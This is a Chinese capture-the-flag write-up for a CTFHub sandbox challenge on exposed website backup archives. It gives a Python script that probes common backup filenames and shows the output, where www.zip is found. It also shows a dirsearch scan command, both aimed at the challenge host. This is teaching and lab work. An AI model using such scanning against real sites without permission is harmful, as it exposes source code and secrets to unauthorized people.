目录

法一：使用自动化工具扫描

方法二：使用dirsearch目录扫描器扫描

---

 

法一：使用自动化工具扫描

import requests

url1 = 'http://challenge-0e8fe706d11de65e.sandbox.ctfhub.com:10800/'		# url为被扫描地址，后不加‘/’

# 常见的网站源码备份文件名
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar']

for i in list1:
    for j in list2:
        back = str(i) + '.' + str(j)
        url = str(url1) + '/' + back
        print(back + '    ', end='')
        print(requests.get(url).status_code)

 输出结果为

web.tar    404
web.tar.gz    404
web.zip    404
web.rar    404
website.tar    404
website.tar.gz    404
website.zip    404
website.rar    404
backup.tar    404
backup.tar.gz    404
backup.zip    404
backup.rar    404
back.tar    404
back.tar.gz    404
back.zip    404
back.rar    404
www.tar    404
www.tar.gz    404
www.zip    200
www.rar    404
wwwroot.tar    404
wwwroot.tar.gz    404
wwwroot.zip    404
wwwroot.rar    404
temp.tar    404
temp.tar.gz    404
temp.zip    404
temp.rar    404

可以看到www.zip文件存在，响应码为200

 

 访问该记事本得到flag

方法二：使用dirsearch目录扫描器扫描

最好的目录扫描工具dirsearch-master非常详细使用方法-CSDN博客

github下载dirsearch

GitHub - maurosoria/dirsearch: Web path scanner

注：kali可以使用sudo apt install dirsearch下载

dirsearch 是一个在github上很好用的开源目录扫描工具，具体使用请看文章开头
使用：diresearch -u 接你要扫描的url -e *
-u：url
-e：扩展名列表,用逗号隔开（例如：php,asp）
查看返回值，大部分都是503，返回200的表示可以访问
 

python dirsearch.py -u http://challenge-06dbcc9811aa2e4b.sandbox.ctfhub.com:10800/ -e *

若出现下面的问题可以使用

pip install setuptools

 

 

可以看到同样扫描到了www.zip文件